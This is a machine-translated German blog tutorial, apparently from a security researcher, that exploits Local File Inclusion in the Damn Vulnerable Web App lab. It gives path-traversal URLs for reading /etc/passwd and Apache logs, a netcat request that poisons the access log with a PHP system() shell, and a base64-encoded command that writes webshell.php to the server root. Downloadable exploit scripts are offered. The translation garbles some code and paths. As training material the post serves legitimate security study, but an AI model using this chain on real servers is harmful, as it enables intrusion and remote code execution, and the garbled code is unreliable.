Verdammt Gefährdete Web App - Local File Inclusion (LFI)
Verfasser:
Ashfaq Ansari

Bewertet von:
Wertung:
5
Auf März 18, 2013
Zuletzt geändert:März 18, 2013

Zusammenfassung:

Local File Inclusion (LFI) ist eine Art von Schwachstelle meist auf Websites gefunden. Es erlaubt einem Angreifer, eine lokale Datei enthalten, in der Regel durch ein Skript auf dem Webserver. Die Sicherheitslücke entsteht durch die Verwendung von Benutzereingaben ohne entsprechende Validierung.

Einführung

 

In dem ersten Teil Verdammt Gefährdete Web App (DVWA) Serie, wir haben gesehen, wie wir installieren können Verdammt Gefährdete Web Application (DVWA) auf BackTrack 5 R1.
 

Wenn Sie noch nicht gelesen haben den ersten Teil, hier ist der Link: http://hacksys.vfreaks.com / Stift-testing / verdammt verletzlich-web-app-sql-injection.html

 

Jetzt, wir testen Sie eine andere Angriffsmethode bekannt als Local File Inclusion (LFI).
 

Local File Inclusion (LFI) ist eine Art von Schwachstelle meist auf Websites gefunden. Es erlaubt einem Angreifer, eine lokale Datei enthalten, in der Regel durch ein Skript auf dem Webserver.
 

Die Sicherheitslücke entsteht durch die Verwendung von Benutzereingaben ohne entsprechende Validierung. Dies kann etwas so gering wie Ausgeben der Inhalt der Datei führen, aber je nach Schwere, um nur einige aufzulisten es kann dazu führen,:
 


1. Codeausführung auf dem Webserver.
2. Codeausführung auf der Client-Seite wie JavaScript, die auf andere Angriffe wie Cross-Site-Scripting führen können (XSS).
3. Denial of Service (DoS).
4. Datendiebstahl und Datenmanipulation.

 

Jetzt, die Idee hinter Local File Inclusion (LFI) Angriffsmethode ist, dass, es kann ein Angreifer lokale Dateien auf dem Web-Server mit der anfälligen Web-Skript enthalten, wenn der Webserver die Berechtigung für den Zugriff.
 

Sie alle müssen denken “Was ist viel drin?”.
 

Nun, Ich muss sagen, dass dies eine sehr schwere Frage ist wenn der Webserver ist nicht richtig konfiguriert.
 

Lassen Sie uns, der Auffassung, dass ein Angreifer in der Lage, eine lokale Datei auf dem Webserver sind anfällig ist via PHP-Skript. Es bedeutet, dass er in der Lage, beliebige PHP-Code, der es in der Datei, die enthalten ist auszuführen.
 

Jetzt, einige von euch müssen denken “Was ist die Verwendung von PHP-Skript ausgeführt, indem eine lokale Datei, wenn es nicht hilft ein Hacker Zugriff zu erlangen?”.
 

Der Apache HTTP Server bietet eine Vielzahl von verschiedenen Mechanismen zur Protokollierung alles, was auf dem Webserver passiert, von der ersten Anfrage, durch das URL-Mapping-Verfahren, zur endgültigen Auflösung der Verbindung, einschließlich aller Fehler, die in dem Prozess aufgetreten sind.
 

Hier ist ein Ausschnitt der Sicherheitswarnung gefunden auf Apache HTTP Server-Dokumentation Seite.
 

Link: http://httpd.apache.org/docs/2.4/logs.html
 

Sicherheitswarnung: Wer in das Verzeichnis, wo Apache Schreiben einer Protokolldatei schreiben kann, kann fast sicher Zugriff auf die uid, dass der Server als gestartet, Das ist normalerweise root. Nicht den Menschen Schreibzugriff auf das Verzeichnis werden die Protokolle in ohne sich der Konsequenzen bewusst gespeichert. sehen Sie das Dokument Sicherheitshinweise für Details. Außerdem, Log-Dateien enthalten Informationen direkt vom Kunden gelieferten, ohne Flucht. Deshalb, ist es möglich, für bösartige Clients control-Zeichen in den Log-Dateien einfügen, so muss darauf im Umgang mit rohem Protokolle genommen werden.

 

Zu Ihrer Information, in BackTrack 5 R1, die Apache HTTP Server-Log- Datei befindet sich unter:
 

/var / log / apache2 / access.log

/var/log/apache2/error.log


 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Log File Path
 

Sie haben bereits lesen Sie die oben Sicherheitswarnung zu den Log-Verzeichnis-Berechtigungen. Wenn der Angreifer erfolgreich in der Suche nach dem Pfad für die Protokolldatei mit Directory Traversal Angriff, er kann diese Log durch Schreiben Schadcode in den Protokolldateien vergiften, wenn die “einloggen” Verzeichnis-und Dateiberechtigungen sind nicht richtig konfiguriert.
 

Wir werden sehen, wie wir können, Gift die Protokolldateien im späteren Teil dieses Beitrags.
 

Bewaffnet mit grundlegenden Informationen über Local File Inclusion (LFI), lasst uns gehen und erleben Sie es in praktischen Teil.
 

Hinweis: In BackTrack 5 R1, die “access.log” Datei Zugriffsrechte für “Sonstiges” eingestellt ist “Verbotene”.

 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Log File Permission
 

Jetzt, geben wir “Lesen können” Zugriffsberechtigung “Sonstiges”.
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Lesen Log File Permission
 

Wir setzen “Lesen können” Erlaubnis, so dass wir in der Lage zu zeigen, sind Local File Inclusion (LFI) Angriffsmethode mit Verdammt Gefährdete Web Application (DVWA).
 

Get Set And Go.

 

Lasst einloggen Verdammt Gefährdete Web Application (DVWA) und stellen Sie die Sicherheit Ebene niedrig.
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Sicherheit bis niedrig
 

Klicken Sie auf File Inclusion.
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) File Inclusion Tab
 

http://192.168.96.128/dvwa / Schwachstellen / at /?page = include.php

 

Um eine Datei zu bearbeiten, sind die ?page = index.php in der URL zu bestimmen, welche Datei enthalten ist.
 

Lassen Sie uns bestätigen, ob die oben genannte URL wirklich anfällig ist Local File Inclusion.
 

Wir werden tun, Directory Traversal und versuchen, gehören /etc / passwd Datei. Wenn diese Aufnahme ist erfolgreich, finden wir Inhalt der /etc / passwd auf der Webseite angezeigt wird.
 

http://192.168.96.128/dvwa / Schwachstellen / at /?page = .. / .. / .. / .. / .. / etc / passwd

 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) /etc/passwd Inclusion
 

Das sieht gut aus! Wir konnten einschließen /etc / passwd Datei im Verdammt Gefährdete Web Application (DVWA) erfolgreich wie die Webseite den Gesamtinhalt der angezeigte hat /etc / passwd Datei.
 

Unsere nächste Aufgabe ist es, zu versuchen, umfassen Protokolldatei von Apache. Wieder, wir nutzen Directory Traversal und versuchen, gehören /var / log / apache2 / access.log Datei.
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Access Log Inclusion
 

http://192.168.96.128/dvwa / Schwachstellen / at /?page = .. / .. / .. / .. / log / apache2 / access.log

 

Wow! Dies ist ein guter Tag für uns. Dinge funktionieren in einem guten Weg. Apache Web Server ist access.log Datei erfolgreich inbegriffen. Es ist eine große Anzeige, dass jetzt, wir können auf den Kopf und versuchen, Gift die Apache-Fehlerprotokoll.
 

Hinweis: Wie ich habe mit diesem BackTrack 5 R1 seit einem Jahr. Ich werde klar aus der access.log und error.log so dass ich in der Lage bin, Ihnen das vergiftete Teil der Log-Dateien leicht.    

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Protokolle löschen

Wir sind bereit, Gift die access.log Datei. Dies ist ein wichtiger Schritt, da dies hilft dem Angreifer die zählen access.log Datei und führen Sie die vergiftet PHP-Code das wird geschrieben werden access.log In diesem Schritt. Die Vergiftung kann durch Überprüfung der Inhalte bestätigt werden error.log Datei.
 

Öffnen Sie eine Klemme und die Verbindung Apache Web Server auf Port 80 Verwendung netcat.
 

1
2
3
root @ bt:~ # nc 192.168.96.128 80

GET /hazStart<?php System(base64_decode($_GET[a]));?>HTTP hazEnd/1.1

 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Gift-Logs
 

Jetzt, können bestätigen, ob Vergiftung erfolgreich war. Dazu, öffnen wir sowohl access.log und error.log einreichen und versuchen, es zu verstehen Einträge.
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Gift-Logs
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Gift-Logs
 

Kühlen! Wir haben die Protokolldateien vergiftet. Jedes Ding hat wie erwartet gearbeitet.
 

Hinweis: Wir haben bereits eine Mini-PHP-Shell in geschrieben access.log Log-Datei. Jetzt ist unsere nächste Motiv ist ein anderes Mini PHP-Shell in der Wurzel der Web-Server, der die Web Application Verdammt Gefährdete schreiben (DVWA).

 

Hier ist der Befehl, eine Mini-PHP-Shell auf dem Web-Server zu schreiben.
 

1
echo "<?php System(base64_decode($_GET['P'])); ?>" > ../../webshell.php

 

Wenn Sie sich erinnern die Mini-PHP-Shell Skript, dass wir in der eingespritzte access.log Datei, das Shell-Skript-Code ist unten angegeben:
 

1
<?php System(base64_decode($_GET['A'])); ?>

 

Können Sie erraten, den nächsten Schritt zu tun, dass wir nach einem Blick das Shell-Skript-Code?
 

Nun, jetzt werden wir codieren den Befehl, den Mini PHP Shell-Skript auf dem Web-Server mit root schreiben base64 Encoding-Algorithmus.
 

Hier ist ein einfaches Python-Programm zu base64 kodieren ein String:
 

1
2
3
4
5
#!/usr / bin / python

base64encodedstr = """echo "<?php System(base64_decode($_GET['P'])); ?>" > ../../webshell.php"""

drucken "\nCodierten String: " + base64encodedstr.kodieren("Base64","Strenge") + "\n"

 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Base64 Encode
 

Die Base64 codierten String ist unten angegeben:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

Das wird der letzte Schritt sein, bevor wir es mit einer Schale empfangen. 🙂
 

Wir werden auf der Ebene URL unten gegeben, um den Schreib Mini-PHP-Shell-Skript zu Web-Server-Root-.

http://192.168.96.128/dvwa / Schwachstellen / at /?page = .. / .. / .. / .. / log / apache2 / access.log?a = ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) PHP Web Shell
 

Schließlich!! Wir haben es geschafft erfolgreich. Wir haben eine hochgeladen Mini-PHP-Shell Verwendung eines Local File Inclusion Vulnerability in Verdammt Gefährdete Web Application (DVWA).
 

Ich liebe Automatisierung und das ist der Grund, warum ich liebe Python. Python bietet Ihnen hervorragende Leistung, um komplexe Dinge sehr einfach zu erreichen.
 

Ich habe ein Python-Skript geschrieben, dass wir die Ausbeutung der Automatisierung schrieb Local File Inclusion (LFI) in Verdammt Gefährdete Web Application (DVWA).
 

Verdammt Gefährdete Web Application - Local File Inclusion (LFI) Exploit-Skript
 

Da die Länge der Ausnutzung Skript ist sehr groß, Ich habe alle Skripte in diesem Beitrag verwendet gezippt und steht zum Download bereit.
 

Herunterladen Verdammt Gefährdete Web Application – Local File Inclusion (LFI) senden Materialien:
 

DVWA - LFI Exploit Scripts
3.9 KIB
644 Downloads
Einzelheiten ...

 

Vielen Dank für Ihre Zeit, diesen Beitrag zu lesen. Ich hoffe das hilft dir. Bitte zögern Sie nicht zurücklassen Kommentare, wenn Sie Zweifel haben oder wenn Sie etwas zu besprechen wollen Local File Inclusion (LFI).
 

46,422 Ansichten, 33 von heute

Die folgenden zwei Registerkarten wechseln Gehalt unter.

Ashfaq Ansari

Sicherheit Researcher
Ashfaq Ansari ist der Gründer von HackSys Teams Codenamen "Panthera". Er ist ein Sicherheitsexperte mit Erfahrung in verschiedenen Aspekten der Informationssicherheit. Er ist Autor "HackSys Extreme Vulnerable Treiber" und "Shellcode of Death". Er hat auch geschrieben und veröffentlicht verschiedene Whitepapers auf niedrigem Niveau Software Ausbeutung. Seine Kern Interesse liegt in "Low Level Exploitation", "Reverse Engineering", "Program Analysis" und "Hybrid Fuzzing". Er ist ein fanboy der Künstlichen Intelligenz und maschinelles Lernen. Er ist das Kapitel für Blei null Pune.

2 Antworten : “Verdammt Gefährdete Web App - Local File Inclusion (LFI)”

  1. Wäre es möglich, den Angriff, ohne die Leseberechtigung auf der access.log zeigen. Mit anderen Worten: Verlassen der Berechtigungssatz verboten? Da die meisten Server können diesen Satz in den ersten Platz haben. wäre sehr dankbar.

    • Hallo KC,

      Unglücklicherweise, die Protokolldatei haben muss Leseberechtigung auf access.log.

      Es sei denn, Wir sind in der Lage, die Datei zu lesen, wir werden nicht für die Durchführung der Attacke in der Lage sein,.

      Jedoch, Du darfst versuchen, verschiedene Angriffs.

      Dank.

Einen Kommentar schreiben

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *